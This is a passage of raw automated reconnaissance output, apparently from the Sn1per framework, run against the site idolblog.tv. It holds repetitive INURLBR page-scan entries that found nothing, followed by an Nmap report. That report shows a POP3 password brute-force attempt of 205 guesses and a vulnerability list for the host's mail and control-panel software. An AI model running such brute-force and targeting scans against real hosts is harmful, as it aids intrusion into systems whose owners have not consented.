3386 _[ - ]::--------------------------------------------------------------------------------------------------------------
3387|_[ + ] [ 42 / 100 ]-[03:45:33] [ - ]
3388|_[ + ] Target:: [ http://idolblog.tv/page/98/ ]
3389|_[ + ] Exploit::
3390|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3391|_[ + ] More details:: / - / , ISP:
3392|_[ + ] Found:: UNIDENTIFIED
3393
3394 _[ - ]::--------------------------------------------------------------------------------------------------------------
3395|_[ + ] [ 43 / 100 ]-[03:45:36] [ - ]
3396|_[ + ] Target:: [ http://idolblog.tv/page/46/ ]
3397|_[ + ] Exploit::
3398|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3399|_[ + ] More details:: / - / , ISP:
3400|_[ + ] Found:: UNIDENTIFIED
3401
3402 _[ - ]::--------------------------------------------------------------------------------------------------------------
3403|_[ + ] [ 44 / 100 ]-[03:45:38] [ - ]
3404|_[ + ] Target:: [ http://idolblog.tv/page/153/ ]
3405|_[ + ] Exploit::
3406|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3407|_[ + ] More details:: / - / , ISP:
3408|_[ + ] Found:: UNIDENTIFIED
3409
3410 _[ - ]::--------------------------------------------------------------------------------------------------------------
3411|_[ + ] [ 45 / 100 ]-[03:45:41] [ - ]
3412|_[ + ] Target:: [ http://idolblog.tv/page/59/ ]
3413|_[ + ] Exploit::
3414|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3415|_[ + ] More details:: / - / , ISP:
3416|_[ + ] Found:: UNIDENTIFIED
3417
3418 _[ - ]::--------------------------------------------------------------------------------------------------------------
3419|_[ + ] [ 46 / 100 ]-[03:45:44] [ - ]
3420|_[ + ] Target:: [ http://idolblog.tv/category/videos/ ]
3421|_[ + ] Exploit::
3422|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3423|_[ + ] More details:: / - / , ISP:
3424|_[ + ] Found:: UNIDENTIFIED
3425
3426 _[ - ]::--------------------------------------------------------------------------------------------------------------
3427|_[ + ] [ 47 / 100 ]-[03:45:47] [ - ]
3428|_[ + ] Target:: [ http://idolblog.tv/page/15/ ]
3429|_[ + ] Exploit::
3430|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3431|_[ + ] More details:: / - / , ISP:
3432|_[ + ] Found:: UNIDENTIFIED
3433
3434 _[ - ]::--------------------------------------------------------------------------------------------------------------
3435|_[ + ] [ 48 / 100 ]-[03:45:50] [ - ]
3436|_[ + ] Target:: [ http://idolblog.tv/page/51/ ]
3437|_[ + ] Exploit::
3438|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3439|_[ + ] More details:: / - / , ISP:
3440|_[ + ] Found:: UNIDENTIFIED
3441
3442 _[ - ]::--------------------------------------------------------------------------------------------------------------
3443|_[ + ] [ 49 / 100 ]-[03:45:53] [ - ]
3444|_[ + ] Target:: [ http://idolblog.tv/page/122/ ]
3445|_[ + ] Exploit::
3446|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3447|_[ + ] More details:: / - / , ISP:
3448|_[ + ] Found:: UNIDENTIFIED
3449
3450 _[ - ]::--------------------------------------------------------------------------------------------------------------
3451|_[ + ] [ 50 / 100 ]-[03:45:56] [ - ]
3452|_[ + ] Target:: [ http://idolblog.tv/page/64/ ]
3453|_[ + ] Exploit::
3454|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3455|_[ + ] More details:: / - / , ISP:
3456|_[ + ] Found:: UNIDENTIFIED
3457
3458 _[ - ]::--------------------------------------------------------------------------------------------------------------
3459|_[ + ] [ 51 / 100 ]-[03:45:58] [ - ]
3460|_[ + ] Target:: [ http://idolblog.tv/page/69/ ]
3461|_[ + ] Exploit::
3462|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3463|_[ + ] More details:: / - / , ISP:
3464|_[ + ] Found:: UNIDENTIFIED
3465
3466 _[ - ]::--------------------------------------------------------------------------------------------------------------
3467|_[ + ] [ 52 / 100 ]-[03:46:01] [ - ]
3468|_[ + ] Target:: [ http://idolblog.tv/page/104/ ]
3469|_[ + ] Exploit::
3470|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3471|_[ + ] More details:: / - / , ISP:
3472|_[ + ] Found:: UNIDENTIFIED
3473
3474 _[ - ]::--------------------------------------------------------------------------------------------------------------
3475|_[ + ] [ 53 / 100 ]-[03:46:04] [ - ]
3476|_[ + ] Target:: [ http://idolblog.tv/page/134/ ]
3477|_[ + ] Exploit::
3478|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3479|_[ + ] More details:: / - / , ISP:
3480|_[ + ] Found:: UNIDENTIFIED
3481
3482 _[ - ]::--------------------------------------------------------------------------------------------------------------
3483|_[ + ] [ 54 / 100 ]-[03:46:07] [ - ]
3484|_[ + ] Target:: [ http://idolblog.tv/page/12/ ]
3485|_[ + ] Exploit::
3486|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3487|_[ + ] More details:: / - / , ISP:
3488|_[ + ] Found:: UNIDENTIFIED
3489
3490 _[ - ]::--------------------------------------------------------------------------------------------------------------
3491|_[ + ] [ 55 / 100 ]-[03:46:10] [ - ]
3492|_[ + ] Target:: [ http://idolblog.tv/page/112/ ]
3493|_[ + ] Exploit::
3494|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3495|_[ + ] More details:: / - / , ISP:
3496|_[ + ] Found:: UNIDENTIFIED
3497
3498 _[ - ]::--------------------------------------------------------------------------------------------------------------
3499|_[ + ] [ 56 / 100 ]-[03:46:14] [ - ]
3500|_[ + ] Target:: [ http://idolblog.tv/page/148/ ]
3501|_[ + ] Exploit::
3502|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3503|_[ + ] More details:: / - / , ISP:
3504|_[ + ] Found:: UNIDENTIFIED
3505
3506 _[ - ]::--------------------------------------------------------------------------------------------------------------
3507|_[ + ] [ 57 / 100 ]-[03:46:17] [ - ]
3508|_[ + ] Target:: [ http://idolblog.tv/page/84/ ]
3509|_[ + ] Exploit::
3510|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3511|_[ + ] More details:: / - / , ISP:
3512|_[ + ] Found:: UNIDENTIFIED
3513
3514 _[ - ]::--------------------------------------------------------------------------------------------------------------
3515|_[ + ] [ 58 / 100 ]-[03:46:20] [ - ]
3516|_[ + ] Target:: [ http://idolblog.tv/page/20/ ]
3517|_[ + ] Exploit::
3518|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3519|_[ + ] More details:: / - / , ISP:
3520|_[ + ] Found:: UNIDENTIFIED
3521
3522 _[ - ]::--------------------------------------------------------------------------------------------------------------
3523|_[ + ] [ 59 / 100 ]-[03:46:23] [ - ]
3524|_[ + ] Target:: [ http://idolblog.tv/page/28/ ]
3525|_[ + ] Exploit::
3526|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3527|_[ + ] More details:: / - / , ISP:
3528|_[ + ] Found:: UNIDENTIFIED
3529
3530 _[ - ]::--------------------------------------------------------------------------------------------------------------
3531|_[ + ] [ 60 / 100 ]-[03:46:26] [ - ]
3532|_[ + ] Target:: [ http://idolblog.tv/page/114/ ]
3533|_[ + ] Exploit::
3534|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3535|_[ + ] More details:: / - / , ISP:
3536|_[ + ] Found:: UNIDENTIFIED
3537
3538 _[ - ]::--------------------------------------------------------------------------------------------------------------
3539|_[ + ] [ 61 / 100 ]-[03:46:29] [ - ]
3540|_[ + ] Target:: [ http://idolblog.tv/page/79/ ]
3541|_[ + ] Exploit::
3542|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3543|_[ + ] More details:: / - / , ISP:
3544|_[ + ] Found:: UNIDENTIFIED
3545
3546 _[ - ]::--------------------------------------------------------------------------------------------------------------
3547|_[ + ] [ 62 / 100 ]-[03:46:32] [ - ]
3548|_[ + ] Target:: [ http://idolblog.tv/page/75/ ]
3549|_[ + ] Exploit::
3550|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3551|_[ + ] More details:: / - / , ISP:
3552|_[ + ] Found:: UNIDENTIFIED
3553
3554 _[ - ]::--------------------------------------------------------------------------------------------------------------
3555|_[ + ] [ 63 / 100 ]-[03:46:35] [ - ]
3556|_[ + ] Target:: [ http://idolblog.tv/page/93/ ]
3557|_[ + ] Exploit::
3558|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3559|_[ + ] More details:: / - / , ISP:
3560|_[ + ] Found:: UNIDENTIFIED
3561
3562 _[ - ]::--------------------------------------------------------------------------------------------------------------
3563|_[ + ] [ 64 / 100 ]-[03:46:38] [ - ]
3564|_[ + ] Target:: [ http://idolblog.tv/page/8/ ]
3565|_[ + ] Exploit::
3566|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3567|_[ + ] More details:: / - / , ISP:
3568|_[ + ] Found:: UNIDENTIFIED
3569
3570 _[ - ]::--------------------------------------------------------------------------------------------------------------
3571|_[ + ] [ 65 / 100 ]-[03:46:41] [ - ]
3572|_[ + ] Target:: [ http://idolblog.tv/page/127/ ]
3573|_[ + ] Exploit::
3574|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3575|_[ + ] More details:: / - / , ISP:
3576|_[ + ] Found:: UNIDENTIFIED
3577
3578 _[ - ]::--------------------------------------------------------------------------------------------------------------
3579|_[ + ] [ 66 / 100 ]-[03:46:44] [ - ]
3580|_[ + ] Target:: [ http://idolblog.tv/page/6/ ]
3581|_[ + ] Exploit::
3582|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3583|_[ + ] More details:: / - / , ISP:
3584|_[ + ] Found:: UNIDENTIFIED
3585
3586 _[ - ]::--------------------------------------------------------------------------------------------------------------
3587|_[ + ] [ 67 / 100 ]-[03:46:47] [ - ]
3588|_[ + ] Target:: [ http://idolblog.tv/page/44/ ]
3589|_[ + ] Exploit::
3590|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3591|_[ + ] More details:: / - / , ISP:
3592|_[ + ] Found:: UNIDENTIFIED
3593
3594 _[ - ]::--------------------------------------------------------------------------------------------------------------
3595|_[ + ] [ 68 / 100 ]-[03:46:50] [ - ]
3596|_[ + ] Target:: [ http://idolblog.tv/page/3/ ]
3597|_[ + ] Exploit::
3598|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3599|_[ + ] More details:: / - / , ISP:
3600|_[ + ] Found:: UNIDENTIFIED
3601
3602 _[ - ]::--------------------------------------------------------------------------------------------------------------
3603|_[ + ] [ 69 / 100 ]-[03:46:54] [ - ]
3604|_[ + ] Target:: [ http://idolblog.tv/page/110/ ]
3605|_[ + ] Exploit::
3606|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3607|_[ + ] More details:: / - / , ISP:
3608|_[ + ] Found:: UNIDENTIFIED
3609
3610 _[ - ]::--------------------------------------------------------------------------------------------------------------
3611|_[ + ] [ 70 / 100 ]-[03:46:57] [ - ]
3612|_[ + ] Target:: [ http://idolblog.tv/page/62/ ]
3613|_[ + ] Exploit::
3614|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3615|_[ + ] More details:: / - / , ISP:
3616|_[ + ] Found:: UNIDENTIFIED
3617
3618 _[ - ]::--------------------------------------------------------------------------------------------------------------
3619|_[ + ] [ 71 / 100 ]-[03:47:01] [ - ]
3620|_[ + ] Target:: [ http://idolblog.tv/page/56/ ]
3621|_[ + ] Exploit::
3622|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3623|_[ + ] More details:: / - / , ISP:
3624|_[ + ] Found:: UNIDENTIFIED
3625
3626 _[ - ]::--------------------------------------------------------------------------------------------------------------
3627|_[ + ] [ 72 / 100 ]-[03:47:05] [ - ]
3628|_[ + ] Target:: [ http://idolblog.tv/32979-2/ ]
3629|_[ + ] Exploit::
3630|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3631|_[ + ] More details:: / - / , ISP:
3632|_[ + ] Found:: UNIDENTIFIED
3633
3634 _[ - ]::--------------------------------------------------------------------------------------------------------------
3635|_[ + ] [ 73 / 100 ]-[03:47:08] [ - ]
3636|_[ + ] Target:: [ http://idolblog.tv/page/101/ ]
3637|_[ + ] Exploit::
3638|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3639|_[ + ] More details:: / - / , ISP:
3640|_[ + ] Found:: UNIDENTIFIED
3641
3642 _[ - ]::--------------------------------------------------------------------------------------------------------------
3643|_[ + ] [ 74 / 100 ]-[03:47:11] [ - ]
3644|_[ + ] Target:: [ http://idolblog.tv/category/dvds/ ]
3645|_[ + ] Exploit::
3646|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3647|_[ + ] More details:: / - / , ISP:
3648|_[ + ] Found:: UNIDENTIFIED
3649
3650 _[ - ]::--------------------------------------------------------------------------------------------------------------
3651|_[ + ] [ 75 / 100 ]-[03:47:15] [ - ]
3652|_[ + ] Target:: [ http://idolblog.tv/page/18/ ]
3653|_[ + ] Exploit::
3654|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3655|_[ + ] More details:: / - / , ISP:
3656|_[ + ] Found:: UNIDENTIFIED
3657
3658 _[ - ]::--------------------------------------------------------------------------------------------------------------
3659|_[ + ] [ 76 / 100 ]-[03:47:19] [ - ]
3660|_[ + ] Target:: [ http://idolblog.tv/page/108/ ]
3661|_[ + ] Exploit::
3662|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3663|_[ + ] More details:: / - / , ISP:
3664|_[ + ] Found:: UNIDENTIFIED
3665
3666 _[ - ]::--------------------------------------------------------------------------------------------------------------
3667|_[ + ] [ 77 / 100 ]-[03:47:23] [ - ]
3668|_[ + ] Target:: [ http://idolblog.tv/page/57/ ]
3669|_[ + ] Exploit::
3670|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3671|_[ + ] More details:: / - / , ISP:
3672|_[ + ] Found:: UNIDENTIFIED
3673
3674 _[ - ]::--------------------------------------------------------------------------------------------------------------
3675|_[ + ] [ 78 / 100 ]-[03:47:26] [ - ]
3676|_[ + ] Target:: [ http://idolblog.tv/page/152/ ]
3677|_[ + ] Exploit::
3678|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3679|_[ + ] More details:: / - / , ISP:
3680|_[ + ] Found:: UNIDENTIFIED
3681
3682 _[ - ]::--------------------------------------------------------------------------------------------------------------
3683|_[ + ] [ 79 / 100 ]-[03:47:29] [ - ]
3684|_[ + ] Target:: [ http://idolblog.tv/page/143/ ]
3685|_[ + ] Exploit::
3686|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3687|_[ + ] More details:: / - / , ISP:
3688|_[ + ] Found:: UNIDENTIFIED
3689
3690idolblog.tv _[ - ]::--------------------------------------------------------------------------------------------------------------
3691|_[ + ] [ 80 / 100 ]-[03:47:31] [ - ]
3692|_[ + ] Target:: [ http://idolblog.tv/page/49/ ]
3693|_[ + ] Exploit::
3694|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3695|_[ + ] More details:: / - / , ISP:
3696|_[ + ] Found:: UNIDENTIFIED
3697
3698 _[ - ]::--------------------------------------------------------------------------------------------------------------
3699|_[ + ] [ 81 / 100 ]-[03:47:34] [ - ]
3700|_[ + ] Target:: [ http://idolblog.tv/page/68/ ]
3701|_[ + ] Exploit::
3702|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3703|_[ + ] More details:: / - / , ISP:
3704|_[ + ] Found:: UNIDENTIFIED
3705
3706 _[ - ]::--------------------------------------------------------------------------------------------------------------
3707|_[ + ] [ 82 / 100 ]-[03:47:37] [ - ]
3708|_[ + ] Target:: [ http://idolblog.tv/tag/erika/ ]
3709|_[ + ] Exploit::
3710|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3711|_[ + ] More details:: / - / , ISP:
3712|_[ + ] Found:: UNIDENTIFIED
3713
3714 _[ - ]::--------------------------------------------------------------------------------------------------------------
3715|_[ + ] [ 83 / 100 ]-[03:47:39] [ - ]
3716|_[ + ] Target:: [ http://idolblog.tv/page/109/ ]
3717|_[ + ] Exploit::
3718|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3719|_[ + ] More details:: / - / , ISP:
3720|_[ + ] Found:: UNIDENTIFIED
3721
3722 _[ - ]::--------------------------------------------------------------------------------------------------------------
3723|_[ + ] [ 84 / 100 ]-[03:47:42] [ - ]
3724|_[ + ] Target:: [ http://idolblog.tv/category/photobooks/ ]
3725|_[ + ] Exploit::
3726|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3727|_[ + ] More details:: / - / , ISP:
3728|_[ + ] Found:: UNIDENTIFIED
3729
3730 _[ - ]::--------------------------------------------------------------------------------------------------------------
3731|_[ + ] [ 85 / 100 ]-[03:47:45] [ - ]
3732|_[ + ] Target:: [ http://idolblog.tv/page/115/ ]
3733|_[ + ] Exploit::
3734|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3735|_[ + ] More details:: / - / , ISP:
3736|_[ + ] Found:: UNIDENTIFIED
3737
3738 _[ - ]::--------------------------------------------------------------------------------------------------------------
3739|_[ + ] [ 86 / 100 ]-[03:47:47] [ - ]
3740|_[ + ] Target:: [ http://idolblog.tv/page/26/ ]
3741|_[ + ] Exploit::
3742|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3743|_[ + ] More details:: / - / , ISP:
3744|_[ + ] Found:: UNIDENTIFIED
3745
3746 _[ - ]::--------------------------------------------------------------------------------------------------------------
3747|_[ + ] [ 87 / 100 ]-[03:47:50] [ - ]
3748|_[ + ] Target:: [ http://idolblog.tv/page/32/ ]
3749|_[ + ] Exploit::
3750|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3751|_[ + ] More details:: / - / , ISP:
3752|_[ + ] Found:: UNIDENTIFIED
3753
3754 _[ - ]::--------------------------------------------------------------------------------------------------------------
3755|_[ + ] [ 88 / 100 ]-[03:47:53] [ - ]
3756|_[ + ] Target:: [ http://idolblog.tv/page/27/ ]
3757|_[ + ] Exploit::
3758|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3759|_[ + ] More details:: / - / , ISP:
3760|_[ + ] Found:: UNIDENTIFIED
3761
3762 _[ - ]::--------------------------------------------------------------------------------------------------------------
3763|_[ + ] [ 89 / 100 ]-[03:47:55] [ - ]
3764|_[ + ] Target:: [ http://idolblog.tv/page/52/ ]
3765|_[ + ] Exploit::
3766|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3767|_[ + ] More details:: / - / , ISP:
3768|_[ + ] Found:: UNIDENTIFIED
3769
3770 _[ - ]::--------------------------------------------------------------------------------------------------------------
3771|_[ + ] [ 90 / 100 ]-[03:47:59] [ - ]
3772|_[ + ] Target:: [ http://idolblog.tv/page/85/ ]
3773|_[ + ] Exploit::
3774|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3775|_[ + ] More details:: / - / , ISP:
3776|_[ + ] Found:: UNIDENTIFIED
3777
3778 _[ - ]::--------------------------------------------------------------------------------------------------------------
3779|_[ + ] [ 91 / 100 ]-[03:48:02] [ - ]
3780|_[ + ] Target:: [ http://idolblog.tv/page/10/ ]
3781|_[ + ] Exploit::
3782|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3783|_[ + ] More details:: / - / , ISP:
3784|_[ + ] Found:: UNIDENTIFIED
3785
3786 _[ - ]::--------------------------------------------------------------------------------------------------------------
3787|_[ + ] [ 92 / 100 ]-[03:48:05] [ - ]
3788|_[ + ] Target:: [ http://idolblog.tv/author/idolblog/ ]
3789|_[ + ] Exploit::
3790|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3791|_[ + ] More details:: / - / , ISP:
3792|_[ + ] Found:: UNIDENTIFIED
3793
3794 _[ - ]::--------------------------------------------------------------------------------------------------------------
3795|_[ + ] [ 93 / 100 ]-[03:48:08] [ - ]
3796|_[ + ] Target:: [ http://idolblog.tv/page/157/ ]
3797|_[ + ] Exploit::
3798|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3799|_[ + ] More details:: / - / , ISP:
3800|_[ + ] Found:: UNIDENTIFIED
3801
3802 _[ - ]::--------------------------------------------------------------------------------------------------------------
3803|_[ + ] [ 94 / 100 ]-[03:48:11] [ - ]
3804|_[ + ] Target:: [ http://idolblog.tv/page/103/ ]
3805|_[ + ] Exploit::
3806|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3807|_[ + ] More details:: / - / , ISP:
3808|_[ + ] Found:: UNIDENTIFIED
3809
3810 _[ - ]::--------------------------------------------------------------------------------------------------------------
3811|_[ + ] [ 95 / 100 ]-[03:48:14] [ - ]
3812|_[ + ] Target:: [ http://idolblog.tv/page/63/ ]
3813|_[ + ] Exploit::
3814|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3815|_[ + ] More details:: / - / , ISP:
3816|_[ + ] Found:: UNIDENTIFIED
3817
3818 _[ - ]::--------------------------------------------------------------------------------------------------------------
3819|_[ + ] [ 96 / 100 ]-[03:48:17] [ - ]
3820|_[ + ] Target:: [ http://idolblog.tv/category/other/ ]
3821|_[ + ] Exploit::
3822|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3823|_[ + ] More details:: / - / , ISP:
3824|_[ + ] Found:: UNIDENTIFIED
3825
3826 _[ - ]::--------------------------------------------------------------------------------------------------------------
3827|_[ + ] [ 97 / 100 ]-[03:48:19] [ - ]
3828|_[ + ] Target:: [ http://idolblog.tv/page/129/ ]
3829|_[ + ] Exploit::
3830|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3831|_[ + ] More details:: / - / , ISP:
3832|_[ + ] Found:: UNIDENTIFIED
3833
3834 _[ - ]::--------------------------------------------------------------------------------------------------------------
3835|_[ + ] [ 98 / 100 ]-[03:48:22] [ - ]
3836|_[ + ] Target:: [ http://idolblog.tv/page/9/ ]
3837|_[ + ] Exploit::
3838|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3839|_[ + ] More details:: / - / , ISP:
3840|_[ + ] Found:: UNIDENTIFIED
3841
3842 _[ - ]::--------------------------------------------------------------------------------------------------------------
3843|_[ + ] [ 99 / 100 ]-[03:48:25] [ - ]
3844|_[ + ] Target:: [ http://idolblog.tv/page/133/ ]
3845|_[ + ] Exploit::
3846|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3847|_[ + ] More details:: / - / , ISP:
3848|_[ + ] Found:: UNIDENTIFIED
3849
3850[ INFO ] [ Shutting down ]
3851[ INFO ] [ End of process INURLBR at [20-07-2019 03:48:25]
3852[ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
3853[ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/idolblog.tv/output/inurlbr-idolblog.tv ]
3854|_________________________________________________________________________________________
3855
3856\_________________________________________________________________________________________/
3857#######################################################################################################################################
3858Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-20 03:48 EDT
3859Nmap scan report for idolblog.tv (89.248.174.131)
3860Host is up (0.24s latency).
3861
3862PORT STATE SERVICE VERSION
3863110/tcp open pop3 Dovecot DirectAdmin pop3d
3864| pop3-brute:
3865| Accounts: No valid accounts found
3866|_ Statistics: Performed 205 guesses in 184 seconds, average tps: 1.0
3867|_pop3-capabilities: PIPELINING UIDL TOP CAPA AUTH-RESP-CODE SASL(PLAIN) USER STLS RESP-CODES
3868| vulscan: VulDB - https://vuldb.com:
3869| [134480] Dovecot up to 2.3.5.2 Submission-Login Crash denial of service
3870| [134479] Dovecot up to 2.3.5.2 IMAP Server Crash denial of service
3871| [134243] InfinitumIT DirectAdmin up to 1.561 FileManager CSRF privilege escalation
3872| [134024] Dovecot up to 2.3.5.1 JSON Encoder Username Crash denial of service
3873| [132543] Dovecot up to 2.2.36.0/2.3.4.0 Certificate Impersonation weak authentication
3874| [131477] JBMC DirectAdmin 1.55 /CMD_ACCOUNT_ADMIN cross site request forgery
3875| [119762] Dovecot up to 2.2.28 dict Authentication var_expand() denial of service
3876| [114012] Dovecot up to 2.2.33 TLS SNI Restart denial of service
3877| [114009] Dovecot SMTP Delivery Email Message Out-of-Bounds memory corruption
3878| [112447] Dovecot up to 2.2.33/2.3.0 SASL Auth Memory Leak denial of service
3879| [112266] JBMC DirectAdmin up to 1.51 email_ftp_password_change Setting memory corruption
3880| [106837] Dovecot up to 2.2.16 ssl-proxy-openssl.c ssl-proxy-opensslc denial of service
3881| [97052] Dovecot up to 2.2.26 auth-policy Unset Crash denial of service
3882| [95172] Directadmin Controlpanel 1.50.1 /CMD_SELECT_USERS cross site scripting
3883| [95100] DirectAdmin up to 1.50.1 Crash denial of service
3884| [69835] Dovecot 2.2.0/2.2.1 denial of service
3885| [13348] Dovecot up to 1.2.15/2.1.15 IMAP4/POP3 SSL/TLS Handshake denial of service
3886| [65684] Dovecot up to 2.2.6 unknown vulnerability
3887| [9807] Dovecot up to 1.2.7 on Exim Input Sanitizer privilege escalation
3888| [63692] Dovecot up to 2.0.15 spoofing
3889| [7062] Dovecot 2.1.10 mail-search.c denial of service
3890| [62578] DirectAdmin 1.403 cross site scripting
3891| [61198] Jbmc-software DirectAdmin 1.403 cross site scripting
3892| [57517] Dovecot up to 2.0.12 Login directory traversal
3893| [57516] Dovecot up to 2.0.12 Access Restriction directory traversal
3894| [57515] Dovecot up to 2.0.12 Crash denial of service
3895| [54944] Dovecot up to 1.2.14 denial of service
3896| [54943] Dovecot up to 1.2.14 Access Restriction Symlink privilege escalation
3897| [54942] Dovecot up to 2.0.4 Access Restriction denial of service
3898| [54941] Dovecot up to 2.0.4 Access Restriction unknown vulnerability
3899| [54840] Dovecot up to 1.2.12 AGate unknown vulnerability
